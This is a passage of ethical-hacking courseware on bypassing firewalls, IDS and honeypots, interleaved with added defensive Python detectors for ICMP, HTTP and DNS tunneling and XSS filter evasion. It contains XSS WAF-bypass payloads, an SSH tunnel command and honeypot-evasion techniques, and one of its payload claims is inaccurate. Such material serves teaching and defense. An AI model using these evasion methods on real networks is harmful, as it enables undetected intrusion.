The following is the list of proxy servers that can help you to access blocked websites. These proxy websites will hide the actual IP address and show another IP address, which could prevent the website from being blocked, thereby allowing access.

Anonymizer
Source: https://www.anonymizer.com

Anonymizer's VPN routes all the traffic through an encrypted tunnel directly from your laptop to secure and harden servers and networks. It then masks the real IP address to ensure complete and continuous anonymity for all online activities.

Some online anonymizers include:

+ https://www.free-proxy.com
+ http://anonymouse.org
+ https://anonymous-proxy-servers.net
+ https://www.boomproxy.com
+ http://ww7.anype.com
+ https://zendproxy.com
+ https://www.spysurfing.com
+ https://proxify.com
+ http://www.guardster.com
Bypass a Firewall Using a Proxy Server

Steps to be followed to bypass a firewall using a proxy server:

1. Find an appropriate proxy server.
2. In the Tools menu of any Internet browser, go to the Internet Properties dialog box, click "LAN settings" under the Connections tab, and in the "Proxy Settings,"
Bypassing Firewalls through the ICMP Tunneling Method

The ICMP protocol is used to send an error message to the client. As it is a required service for network communication, users often enable this service on their networks. Moreover, it does not entail a significant threat from the security perspective. The attacker takes advantage of the enabled ICMP protocol on the network and performs ICMP tunneling to send his/her malicious data into the target network. The ICMP tunnel provides attackers with full access to target networks.
Figure 12.4: Bypassing firewall through ICMP tunneling (diagram labels: Firewall, Echo packet, Internet Client)
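A defender can detect the tunnel described above by examining echo messages instead of allowing ICMP wholesale. The Python below is an added example, not the courseware's code: it verifies the ICMP checksum, parses echo request and reply messages, and flags payloads that are larger than a normal ping or that match none of the fill patterns common ping utilities use (the 32-byte alphabet block Windows ping sends, or an 8-byte timestamp followed by the counting pattern 0x10, 0x11, ... that iputils ping emits). The size threshold and the sample packets are constructed.

```python
# Added example (not the CEH courseware's code): ICMP echo inspection that
# flags payloads unlike those a normal ping carries.

import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32-byte fill used by ping.exe


def inet_checksum(data):
    """RFC 1071 Internet checksum; evaluates to 0 over an intact message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def checksum_valid(pkt):
    return len(pkt) >= 8 and inet_checksum(pkt) == 0


def build_echo(payload, icmp_type=ECHO_REQUEST, ident=0x1234, seq=1):
    """Constructed ICMP echo message with a correct checksum."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = inet_checksum(hdr + payload)
    return hdr[:2] + struct.pack("!H", csum) + hdr[4:] + payload


def parse_icmp(pkt):
    if not checksum_valid(pkt):
        raise ValueError("truncated ICMP message or bad checksum")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return {"type": icmp_type, "code": code, "ident": ident, "seq": seq, "payload": pkt[8:]}


def looks_like_ping(payload):
    """True for the fill patterns of common ping tools (assumed templates)."""
    if payload == WINDOWS_PATTERN:
        return True
    if len(payload) >= 16:
        expected = bytes((0x10 + i) & 0xFF for i in range(len(payload) - 8))
        return payload[8:] == expected       # 8-byte timestamp, then counting bytes
    return False


def classify_echo(pkt, max_payload=64):
    """Return ("ok"|"suspicious"|"ignore", reason) for one ICMP message."""
    msg = parse_icmp(pkt)
    if msg["type"] not in (ECHO_REQUEST, ECHO_REPLY):
        return ("ignore", "not an echo message")
    payload = msg["payload"]
    if len(payload) > max_payload:
        return ("suspicious", "payload of %d bytes exceeds %d" % (len(payload), max_payload))
    if not looks_like_ping(payload):
        return ("suspicious", "payload matches no ping fill pattern")
    return ("ok", "standard echo")


def count_suspicious(packets):
    """Number of messages in the list that were flagged."""
    return sum(1 for p in packets if classify_echo(p)[0] == "suspicious")


# constructed samples: two ordinary pings and two tunnel-like echoes
LINUX_PING = build_echo(bytes.fromhex("5f3e1a2b00012345") + bytes(range(0x10, 0x10 + 48)))
WINDOWS_PING = build_echo(WINDOWS_PATTERN)
TUNNEL_SMALL = build_echo(b"\x01\x00\x2e\x00tunnel-frame-0001" + bytes(range(200, 240)))
TUNNEL_LARGE = build_echo(bytes(1024), icmp_type=ECHO_REPLY)
SAMPLE = [LINUX_PING, WINDOWS_PING, TUNNEL_SMALL, TUNNEL_LARGE]
```

Real deployments add per-host rate and volume counters, since a tunnel that mimics a ping template exactly is still visible as an implausible number of echo messages carrying data in both directions.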
Bypassing Firewalls through the ACK Tunneling Method

Ordinary packet filtering firewalls define their rule sets based on the SYN packet when TCP level communication is to be established. This is because such a firewall assumes that only the SYN packet is coming from the client and is thus likely to contain malicious code in the SYN packet. These firewalls ignore the possibility that the attacker can also inject malicious code in the ACK packet. As ACK packets are sent after establishing a session, ACK traffic is considered legitimate. In addition, the filtering of ACK packets is ignored to reduce the workload of firewalls, as there can be many ACK packets for one SYN packet. ACK tunneling allows tunneling of a backdoor application with TCP packets with the ACK bit set. The ACK bit acknowledges the receipt of a packet. As stated earlier, some firewalls do not check packets with the ACK bit set, because ACK bits are supposed to be used in response to legitimate traffic that has already been allowed to pass through. Attackers exploit this fact in ACK tunneling. Tools such as AckCmd (http://ntsecurity.nu) use ACK tunneling.
Bypassing Firewalls through the HTTP Tunneling Method

HTTP tunneling allows attackers to perform various Internet tasks despite the restrictions imposed by firewalls. This method can be implemented if the target company has a public web server in which port 80 is used for HTTP traffic that is unfiltered by its firewall. The attacker encapsulates data inside HTTP traffic (via port 80). Many firewalls do not examine the payload of an HTTP packet to confirm that it is legitimate. Thus, it is possible to tunnel traffic via TCP port 80.

Tools such as HTTPTunnel (http://http-tunnel.sourceforge.net) use this technique of tunneling traffic across TCP port 80. HTTPTunnel is a client/server application; the client application is htc, and the server is hts. Upload the server to the target system and redirect it through TCP port

Figure 12.46: Bypassing firewall through HTTP tunneling
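The payload examination that the text says many firewalls skip is what an inspection firewall or proxy does on port 80 traffic. The Python example below is added here and is not code from the courseware or from the tools it names: it parses a request, blocks data that is not well-formed HTTP, blocks CONNECT (which opens a raw byte tunnel through a proxy), and blocks POST bodies whose bytes do not fit the declared Content-Type. The sample requests and the allowed-method list are assumptions.

```python
# Added example (not the CEH courseware's code): protocol-conformance checks
# on traffic sent to TCP port 80.

import re

REQUEST_LINE = re.compile(rb"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]\r\n")
ALLOWED_METHODS = {b"GET", b"HEAD", b"POST"}     # assumed site policy


def parse_request(raw):
    """Return {method, target, headers, body} or None when raw is not an HTTP request."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return None
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None                               # header block never terminated
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m["method"], "target": m["target"], "headers": headers, "body": body}


def body_matches_content_type(ctype, body):
    """Cheap consistency checks between the declared type and the bytes sent."""
    if not body:
        return True
    if ctype.startswith(b"application/x-www-form-urlencoded"):
        return re.fullmatch(rb"[A-Za-z0-9_.~%+=&-]*", body) is not None
    if ctype.startswith(b"application/json"):
        return body.lstrip()[:1] in (b"{", b"[")
    if ctype.startswith(b"text/"):
        return all(32 <= b < 127 or b in (9, 10, 13) for b in body)
    return True                                   # no rule for other types here


def inspect_port80(raw):
    """Return ("allow"|"block", reason) for the bytes a client sent to port 80."""
    req = parse_request(raw)
    if req is None:
        return ("block", "not well-formed HTTP")
    if req["method"] == b"CONNECT":
        return ("block", "CONNECT opens a raw tunnel")
    if req["method"] not in ALLOWED_METHODS:
        return ("block", "method %s not permitted" % req["method"].decode())
    if req["method"] == b"POST":
        ctype = req["headers"].get(b"content-type")
        if ctype is None:
            return ("block", "POST without Content-Type")
        if not body_matches_content_type(ctype, req["body"]):
            return ("block", "body does not match declared Content-Type")
    return ("allow", "looks like HTTP")


# constructed samples
SAMPLES = {
    "normal_get": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "normal_post": (b"POST /login HTTP/1.1\r\nHost: www.example.com\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n\r\nuser=bob&next=%2Fhome"),
    "connect": b"CONNECT mail.example.com:25 HTTP/1.1\r\nHost: mail.example.com:25\r\n\r\n",
    "raw_bytes": b"\x16\x03\x01\x00\xa5\x01\x00\x00",
    "tunnel_post": (b"POST /t HTTP/1.1\r\nHost: www.example.com\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n\x00\x17\xfe\x81tunneled bytes"),
}


def run_samples():
    return {name: inspect_port80(raw)[0] for name, raw in SAMPLES.items()}
```

These checks raise the cost of tunneling but do not eliminate it: a tunnel that encodes its data as valid form fields passes the content-type test, so volume, timing and destination reputation remain necessary signals.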
Why do I Need HTTP Tunneling?

HTTP tunneling is used in scenarios in which network users are granted restricted connectivity through a firewall or proxy; in such conditions, some applications may also lack native communications support.

+ Surfing blocked websites
+ Posting in forums anonymously

HTTP Tunneling Tools

Some HTTP tunneling tools are as follows:

Super Network Tunnel
Source: http://www.networktunnel.net

Super Network Tunnel is a two-way HTTP tunneling software that connects two computers using HTTP-Tunnel Client and HTTP-Tunnel Server. It works like VPN tunneling but uses the HTTP protocol to establish a connection for accessing the Internet without monitoring and provides an extra layer of protection against attackers, spyware, identity theft, and so on. It can bypass any firewall to surf the web, use IM
applications, games, and so on. Further, it integrates the SocksCap function along with bidirectional HTTP tunneling and remote control to simplify the configuration.

This tool allows HTTP, HTTPS, and SOCKS tunneling of any TCP communication between any client-server systems. The TCP traffic is sent from the client to the server via standard HTTP POST requests, which allows penetrating through firewalls, proxy servers, and so on, where HTTP traffic passes.

The client side of a tunnel is the Super Network Tunnel client app, which listens on a particular TCP port for incoming requests. Once the request comes, the program creates an HTTP/HTTPS tunnel to the server and sends data through it. The server side is the Super Network Tunnel server, running on the server computer, which simply forwards the data to the intended recipient app or LAN. Both client and server sides support multiple tunnels and multiple connections through the same tunnel at the same time.
HTTPort
Source: https://www.targeted.org

HTTPort allows users to bypass the HTTP proxy, which blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, and so on. Here, the Internet software is configured so that it connects to a local PC as if it is the required remote server. HTTPort then intercepts that connection and runs it through a tunnel through the proxy. HTTPort can work on devices such as proxies or firewalls that allow HTTP traffic. Thus, HTTPort provides access to websites and Internet apps. HTTPort performs tunneling using one of two modes: SSL/CONNECT mode or a remote host.

In the SSL/CONNECT mode, HTTPort can make a tunnel through a proxy all by itself. It sends requests to the HTTHost. The proxy responds as if the user is surfing a website and thus allows the user to do so. HTTHost, in turn, performs its half of the tunneling and communicates with the target servers. This mode is much slower but works in most

Figure 12.49: Screenshot of HTTPort and HTTHost
Other HTTP Tunneling Tools

+ Tuna (https://github.com)
+ HTTPTunnel (http://http-tunnel.sourceforge.net)
Bypassing Firewalls through the SSH Tunneling Method
Attackers use OpenSSH (OpenBSD Secure Shell) to encrypt and tunnel all traffic from a local machine to a remote machine to avoid detection by perimeter security controls. OpenSSH is a set of computer programs that provide encrypted communication sessions over a computer network using the SSH protocol.
Example:
ssh -f user@certifiedhacker.com -L 5000:certifiedhacker.com:25 -N
Here, -f => background mode, user@certifiedhacker.com => username and server you are logging into, -L 5000:certifiedhacker.com:25 => local-port:host:remote-port, and -N => do not execute a command on the remote system.
SSH Tunneling Tools
Some SSH tunneling tools are listed below:
- Bitvise
Source: https://www.bitvise.com
Bitvise SSH Server provides secure remote login capabilities to Windows workstations and servers by encrypting data during transmission. It is ideal for remote administration of Windows servers, for advanced users who wish to access their home machine from work or their work machine from home, and for a wide spectrum of advanced tasks, such as establishing a VPN using the SSH TCP/IP tunneling feature or providing a secure file depository using SFTP.
Bitvise SSH Client for Windows includes terminal emulation, graphical as well as command-line SFTP support, an FTP-to-SFTP bridge, tunneling features (including dynamic port forwarding through an integrated proxy), and remote administration for SSH Server.
Figure 12.51: Screenshot of Bitvise
- Secure Pipes
Source: https://www.opoet.com
Secure Pipes is an OS X-based SSH tunneling software. Some of the features of Secure Pipes are as follows:
  - Remote Forwards: Selectively open up access to application ports that are usually not easily accessible owing to network or service provider configuration restrictions. Open the door to quickly leverage OS X Server on Internet-facing applications such as email and web hosting.
  - Local Forwards: Open application communication ports to remote servers without opening those ports to public networks. Bring the security of VPN communication to clients and servers on an ad hoc basis without the hassle of configuration and management.
  - SOCKS Proxies: Easily set up and manage a SOCKS proxy server for either a local client or a whole network to privatize communication and overcome local network restrictions. These tunnels are an indispensable and lightweight tool when traveling abroad, performing digital currency transactions, or simply securing a local network.
Figure 12.52: Screenshot of Secure Pipes
Bypassing Firewalls through the DNS Tunneling Method
DNS operates using UDP, and it has a 255-byte limit on outbound queries. Moreover, it allows only alphanumeric characters and hyphens. Such small size constraints on external queries allow DNS to be used as an ideal choice to perform data exfiltration by various malicious entities. Since corrupt or malicious data can be secretly embedded into the DNS protocol packets, even DNSSEC cannot detect the abnormality in DNS tunneling. It is effectively used by malware to bypass the firewall to maintain communication between the victim machine and the C&C server.
Tools such as NSTX (https://sourceforge.net), Heyoka (http://heyoka.sourceforge.net), and Iodine (https://code.kryo.se) use this technique of tunneling traffic across DNS port 53.
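The constraints just described (short, alphanumeric query names, carried by UDP on port 53) are also what a defender can monitor. The following added example, which is not part of the EC-Council courseware, scores DNS query names for tunneling traits (long, high-entropy labels and many unique subdomains under one parent zone from one client) over a constructed log; the log format, thresholds, and sample addresses are this example's own assumptions.

```python
import math
import re
from collections import defaultdict

# Label characters the text mentions: letters, digits, and hyphens.
LABEL_RE = re.compile(r"^[A-Za-z0-9-]+$")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_zone(qname: str) -> str:
    """Crude registered-domain approximation: the last two labels of the name."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_query(qname: str) -> dict:
    """Per-query features plus a 'suspicious' verdict for one DNS query name."""
    name = qname.rstrip(".")
    labels = name.split(".")
    sub_labels = labels[:-2]                      # labels below the parent zone
    longest = max(sub_labels, key=len, default="")
    sub_len = sum(len(l) for l in sub_labels)
    ent = shannon_entropy(longest)
    # Protocol limits: 63 bytes per label, 255 bytes for the whole name.
    well_formed = len(name) <= 255 and all(
        LABEL_RE.match(l) and len(l) <= 63 for l in labels)
    # Heuristic: a lot of subdomain payload, or one long label that looks encoded.
    suspicious = well_formed and (sub_len >= 50 or (len(longest) >= 30 and ent >= 3.5))
    return {"qname": name, "sub_len": sub_len, "longest_label": len(longest),
            "entropy": round(ent, 2), "well_formed": well_formed,
            "suspicious": suspicious}


def detect_tunnels(log_lines, min_unique: int = 5) -> dict:
    """
    Parse constructed 'time client qtype qname' lines and flag (client, zone)
    pairs that sent at least min_unique distinct suspicious names: a single
    long name is rarely a tunnel, a steady stream of unique ones usually is.
    """
    seen = defaultdict(set)
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:
            continue                              # skip malformed log lines
        _ts, client, _qtype, qname = parts
        feat = score_query(qname)
        if feat["suspicious"]:
            seen[(client, parent_zone(qname))].add(feat["qname"].lower())
    return {k: len(v) for k, v in seen.items() if len(v) >= min_unique}


# Constructed sample log (not real traffic): ordinary lookups from 10.0.0.5 and a
# stream of long, encoded-looking names from 10.0.0.9 under one parent zone.
_ENCODED = "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0"
SAMPLE_LOG = [
    "12:00:01 10.0.0.5 A www.example.com",
    "12:00:02 10.0.0.5 A mail.example.com",
    "12:00:03 10.0.0.5 AAAA cdn.static.example.org",
] + [
    f"12:00:{10 + i:02d} 10.0.0.9 TXT {_ENCODED[i:] + _ENCODED[:i]}.tunnel.example.net"
    for i in range(6)
]

if __name__ == "__main__":
    for (client, zone), count in detect_tunnels(SAMPLE_LOG).items():
        print(f"possible DNS tunnel: {client} -> {zone} ({count} unique suspicious names)")
```

The thresholds are deliberately simple; in production they should be tuned against a baseline of the organization's own resolver logs, since CDNs and anti-spam services also generate long labels.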
Bypassing Firewalls through External Systems
Attackers can bypass firewall restrictions of target networks from an external system that can access the internal network. This external system can be:
- A home machine of an employee
- A machine that conducts remote administration of the target network
- A machine from the company's network but located at a different place
Steps to be followed to bypass a firewall through external systems:
1. A legitimate user works with some external system to access the corporate network
2. Attacker sniffs the user traffic and steals the session ID and cookies
3. Attacker accesses the corporate network by bypassing the firewall and gets the Windows ID of the running Mozilla process on the user's system
4. Attacker then issues an OpenURL() command to the found window
5. User's web browser is redirected to the attacker's web server
6. The malicious code embedded in the attacker's web page is downloaded and executed on the user's machine
Bypassing Firewalls through MITM Attacks
Most security administrators focus on the possibility of an external or internal network bypassing their firewall while ignoring the fact that firewalls can be bypassed using MITM attacks on DNS servers. In MITM attacks, attackers use DNS servers and routing techniques to bypass firewall restrictions. They may either take over the corporate DNS server or spoof DNS responses to perform the MITM firewall attack.
Steps to be followed to bypass a firewall through MITM attacks:
1. Attacker performs DNS server poisoning
2. User requests the A record for www.certifiedhacker.com from the corporate DNS server
3. Corporate DNS server sends the IP address (127.22.16.64) of the attacker
4. User accesses the attacker's malicious server
5. Attacker connects to the real host and tunnels the user's HTTP traffic
6. The malicious code embedded in the attacker's web page is downloaded and executed on the user's machine
Bypassing Firewalls through Content
In this method, the attacker sends content containing malicious code to the user and tricks him/her into opening it so that the malicious code can be executed. For example, an attacker can send an email containing a malicious executable file or Microsoft Office document capable of exploiting a macro bypass exploit. Attackers can also target WWW/FTP servers and embed Trojan horse files as software installation files, mobile phone software, and so on to lure users into accessing them. There are many file formats for text, multimedia, and graphics content that can be used to carry malicious content.
Commonly used file formats for carrying malicious content are
- EXE, COM, BAT, PS, PDF
- CDR (Corel Draw)
- DVB, DWG (AutoCAD)
- SMM (AMI Pro)
- DOC, DOT, CNV, ASD (MS Word)
- XLS, XLB, XLT (MS Excel)
- ADP, MDA, MDB, MDE, MDN, MDZ (MS Access)
- VSD (Visio)
- MPP, MPT (MS Project)
- PPT, PPS, POT (MS PowerPoint)
- MSG, OTM (MS Outlook)
Bypassing the WAF using an XSS Attack
An XSS attack exploits vulnerabilities that occur while processing input parameters and the server responses in a web application. Attackers inject malicious HTML code into the victim website to bypass the WAF. The techniques discussed below are using ASCII values to bypass the WAF, using Hex encoding to bypass the WAF, and using obfuscation to bypass the WAF.
Using ASCII values to bypass the WAF
In this technique, attackers use ASCII characters to bypass the WAF. For example, consider the following XSS payload:
<script>alert("XSS")</script>
When the above JavaScript code is executed, the WAF filters escape single quotes, double quotes, magic quotes, etc. Hence, the above payload is filtered by the WAF. To bypass the WAF, we need to convert the above payload into its equivalent ASCII values and then execute it. The JavaScript will automatically convert the ASCII values back into the original characters. Attackers use online websites to convert an XSS payload into its ASCII equivalent. Alternatively, the Hackbar Mozilla addon can be used to get ASCII values.
Consider the XSS payload given below:
XSS Payload: alert("XSS")
The equivalent ASCII values are
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)
The above values are inserted into the XSS payload:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</script>
The above payload bypasses the WAF filters successfully.
Using Hex encoding to bypass the WAF
The encoded value for the XSS payload is
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
The above payload bypasses the WAF filters successfully.
Using Obfuscation to bypass the WAF
Attackers use the obfuscation technique to bypass the WAF. In this technique, attackers use a combination of upper- and lower-case letters in the XSS payload. For example, consider the following XSS payload:
<script>alert("XSS")</script>
Using obfuscation, the above payload is replaced with
<SCRiPt>aLeRT("XSS")</script>
The above payload bypasses the WAF successfully.
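All three bypasses above work against a filter that matches signatures on the raw request. The following added example, which is not part of the EC-Council courseware, shows the defender's fix: canonicalize the input (percent-decode until stable, expand String.fromCharCode, case-fold) before matching. The naive filter is a constructed strawman modelled on the text's description, and the signature patterns are this example's own.

```python
import re
from urllib.parse import unquote

# String.fromCharCode(97, 108, ...) with only digits, spaces and commas inside.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]*)\)", re.IGNORECASE)
# What the filter is really looking for, matched only after canonicalization.
SIGNATURES = re.compile(r"<\s*script\b|\balert\s*\(", re.IGNORECASE)


def naive_blocked(value: str) -> bool:
    """Strawman filter modelled on the text: it only trips on a quoted alert()
    call in the raw input, so encoding or case changes slip past it."""
    return re.search(r"""alert\(["']""", value) is not None


def decode_fromcharcode(value: str) -> str:
    """Replace String.fromCharCode(97, 108, ...) with the characters it would build."""
    def repl(m: re.Match) -> str:
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        try:
            return "".join(chr(c) for c in codes)
        except ValueError:            # code point out of range: leave text untouched
            return m.group(0)
    return FROMCHARCODE_RE.sub(repl, value)


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding until it stops changing (catches double encoding),
    then expand fromCharCode calls and case-fold, so signatures see plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return decode_fromcharcode(value).lower()


def hardened_blocked(value: str) -> bool:
    """Filter that matches signatures against the canonical form of the input."""
    return SIGNATURES.search(canonicalize(value)) is not None


# Constructed inputs: the plain payload and the three variants this section describes.
PAYLOADS = {
    "plain": '<script>alert("XSS")</script>',
    "fromcharcode": "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, "
                    "34, 88, 83, 83, 34, 41)</script>",
    "hex": "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29"
           "%3C%2F%73%63%72%69%70%74%3E",
    "mixed_case": '<SCRiPt>aLeRT("XSS")</script>',
}


def compare_filters(payloads=PAYLOADS) -> dict:
    """Return {name: (naive_blocked, hardened_blocked)} for each payload."""
    return {name: (naive_blocked(p), hardened_blocked(p)) for name, p in payloads.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in compare_filters().items():
        print(f"{name:13s} naive={naive!s:5s} canonicalized={hardened}")
```

Real WAF engines apply many more transformations (HTML entity decoding, Unicode normalization, whitespace compression); the point is the ordering, decode first and match second.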
IDS/Firewall Evading Tools
During firewall evasion, attackers use various security-auditing tools that assess firewall behavior. This section lists some of these tools that help attackers to bypass firewall restrictions. They automate the process of bypassing firewall rules while increasing effectiveness and consuming less time.
Traffic IQ Professional
Source: https://www.idappcom.com
Traffic IQ Professional is a tool that audits and validates the behavior of security devices by generating the standard application traffic or attack traffic between two virtual machines. This tool is generally used by security personnel for assessing, auditing, and testing the behavioral characteristics of any non-proxy packet-filtering device, which can include application firewalls, IDS, IPS, routers, switches, etc. However, as this tool can generate custom attack traffic, it is extensively employed by attackers to bypass the perimeter devices installed in the target network.
Figure 12.55: Screenshot of Traffic IQ Professional
Some additional IDS/firewall evasion tools are as follows:
- Nmap (https://nmap.org)
- Metasploit (https://www.metasploit.com)
- Inundator (https://sourceforge.net)
- IDS-Evasion (https://github.com)
- Hyperion-2.0 (http://nullsecurity.net)
Packet Fragment Generator Tools
There are various packet fragment generators that attackers use to perform fragmentation attacks on firewalls to bypass them.
- Colasoft Packet Builder
Source: https://www.colasoft.com
Colasoft Packet Builder is used to create custom network packets and fragment packets. Attackers use this tool to create custom malicious packets and fragment them such that firewalls cannot detect them. They can create custom network packets such as Ethernet Packet, ARP Packet, IP Packet, TCP Packet, and UDP Packet. Security professionals use this tool to check their network's protection against attacks and intruders.
Figure 12.56: Screenshot of Colasoft Packet Builder
Some additional packet generator tools are listed below:
- CommView (https://www.tamos.com)
- NetScanTools Pro (https://www.netscantools.com)
- Ostinato (https://ostinato.org)
- WAN Killer (https://www.solarwinds.com)
- WireEdit (https://wireedit.com)
Detecting Honeypots
Honeypots are traps set to detect, deflect, or counteract unauthorized intrusion attempts. While attempting to break into the target network, attackers perform honeypot detection using various tools and techniques. This section discusses these tools and how they are used.
A honeypot is an Internet system designed primarily for diverting or attracting attackers by tricking them during their attempts to gain unauthorized access to information systems.
Attackers can determine the presence of honeypots by probing the services running on the system. Attackers use honeypot detection systems or methods to identify the honeypots installed on the target network. They craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMTPS), and IMAP over SSL (IMAPS). Ports that show a particular service running but deny a three-way handshake connection indicate the presence of a honeypot. Once they detect honeypots, attackers try to bypass them so that they can focus on targeting the actual network. Tools to detect honeypots include Send-Safe Honeypot Hunter (http://www.send-safe.com) and kippo_detect (https://github.com).
Note: Attackers can also defeat honeypots by using multi-proxies (TORs) and hiding their conversation using encryption and steganography techniques.
Detecting and Defeating Honeypots
A honeypot is a security mechanism that is deployed to counterattack and trap attackers. Honeypots lure attackers into performing malicious activities, and this attack information provides insights into the level and type of threats a network infrastructure can face. As an attacker, determining whether the target system is a legitimate one or a honeypot is essential to compromise the network without being detected. Identifying and defeating these honeypot establishments stealthily is the fundamental task of a professional hacker.
Some techniques used to identify, detect, and defeat various honeypot infrastructures are discussed below:
- Detecting the presence of Layer 7 Tar Pits: Tar pits are security entities that are similar to honeypots, which are designed to respond slowly to incoming requests. They slow down unauthorized attempts of hackers. Layer 7 tar pits react slowly to incoming SMTP commands by attackers/spammers. Attackers can identify the presence of Layer 7 tar pits by looking at the latency of the response from the service.
- Detecting the presence of Layer 4 Tar Pits: Layer 4 tar pits manipulate the TCP/IP stack and are effectively employed to slow down the spreading of worms, backdoors, etc. In these tar pits, the iptables accept the incoming TCP/IP connection and spontaneously switch to a zero-window size, blocking the attacker from sending further data. This connection cannot be terminated by the attacker, as no data is transferred to the target machine. Layer 4 tar pits such as Labrea can be identified by the attacker by analyzing the TCP window size, where the tar pit continuously acknowledges incoming packets even though the TCP window size is reduced to zero.
- Detecting the presence of Layer 2 Tar Pits: If an attacker launches an attack from the same network, the issue of Layer 2 arises. Layer 2 tar pits are used to block the network penetration of the attacker who gains access to the network as well as to prevent internal threats. The attacker can detect the presence of this daemon by looking at the responses with the unique MAC address 0:0:f:ff:ff:ff, which acts as a kind of black hole. An attacker can also identify the presence of these tar pits by analyzing the ARP responses.
- Detecting Honeypots running on VMware: VMware is a commercially available virtual machine that is used to launch multiple instances of an OS simultaneously. These virtual machines can be configured with various virtual machine resources such as CPU, memory, disks, I/O devices, etc. Owing to its numerous advantages, VMware is widely used to launch honeypots. Attackers can identify instances that are running on the VMware virtual machine by analyzing the MAC address. By looking at the IEEE standards for the current range of MAC addresses assigned to VMware Inc., an attacker can identify the presence of VMware-based honeypots.
- Detecting the presence of Honeyd Honeypot: Honeyd is a widely used honeypot daemon. It is used to create thousands of honeypots easily. It is a network-simulated and service-simulated honeypot deployment engine. This honeyd honeypot can respond to a remote attacker who tries to contact the SMTP service with fake responses.
Figure 12.57: Honeyd fake response
An attacker can identify the presence of honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior). The following figure shows the difference between a response to a normal computer and the response of honeyd honeypot to a manual SYN request sent by an attacker.
Figure 12.58: Response to SYN request by normal computer vs. Honeyd Honeypot
- Detecting the presence of User-Mode Linux (UML) Honeypot: User-Mode Linux is an open-source software under GNU, which is used to create virtual machines and is efficient in deploying honeypots. Attackers can identify the presence of UML honeypots by analyzing files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, which contain UML-specific information.
- Detecting the presence of Sebek-based Honeypots: Sebek is a server/client-based honeypot application that captures the rootkits and other malicious malware that hijacks the read() system call. Such honeypots record all the data accessed via the read() call. Attackers can detect the existence of Sebek-based honeypots by analyzing the congestion in the network layer, as Sebek data communication is usually unencrypted. Since Sebek logs everything that is accessed via the read() call before transferring to the network, it causes the congestion effect.
- Detecting the presence of Snort_inline Honeypot: Snort_inline is a modified version of Snort IDS that is capable of packet manipulation. It is mainly used in GenII (2nd generation) honeynets to block known attacks and avoid attacker bouncing. It can rewrite rules in the iptables. Attackers can identify these honeypots by analyzing the outgoing packets. If an outgoing packet is dropped, it might look like a black hole to an attacker, and when the snort_inline modifies an outgoing packet, the attacker can capture the modified packet through another host system and identify the packet modification.
- Detecting the presence of Fake AP: Fake access points are those that create fake 802.11b beacon frames with randomly generated ESSID and BSSID (MAC address) assignments. Fake access points only send beacon frames but do not produce any fake traffic on the access points, and an attacker can monitor the network traffic and quickly note the presence of fake AP.
- Detecting the presence of Bait and Switch Honeypots: Bait and switch honeypots actively participate in security mechanisms that are employed to respond quickly to incoming threats and malicious attempts. They redirect all malicious network traffic to a honeypot after any intrusion attempt is detected. An attacker can identify the presence of such honeypots by looking at specific TCP/IP parameters such as the Round-Trip Time (RTT), the Time To Live (TTL), and the TCP timestamp.
Honeypot Detection Tools
Attackers use honeypot detection tools such as Send-Safe Honeypot Hunter (http://www.send-safe.com) and kippo_detect (https://github.com) to detect honeypots in the target organizational networks.
- Send-Safe Honeypot Hunter
Source: http://www.send-safe.com
Send-Safe Honeypot Hunter is a tool designed for checking lists of HTTPS and SOCKS proxies for "honey pots."
Features:
  - Checks lists of HTTPS, SOCKS4, and SOCKS5 proxies with any ports
  - Checks several remote or local proxy lists at once
  - Can upload "Valid proxies" and "All except honeypots" files to FTP
  - Can process proxy lists automatically in every specified period
  - May be used for usual proxy list validating as well
Figure 12.59: Screenshot of Send-Safe Honeypot Hunter
How to Defend Against IDS Evasion
- Ensure that IDS normalize fragmented packets and allow those packets to be reassembled in the proper order.
How to Defend Against Firewall Evasion
- The firewall should be configured such that the IP address of an intruder should be filtered out.
- Set the firewall ruleset to deny all traffic and enable only the services required.
- If possible, create a unique user ID to run the firewall services instead of running the services using the administrator or root ID.
- Configure a remote syslog server and adopt strict measures to protect it from malicious users.
- Monitor firewall logs at regular intervals and investigate all suspicious log entries found.
- By default, disable all FTP connections to or from the network.
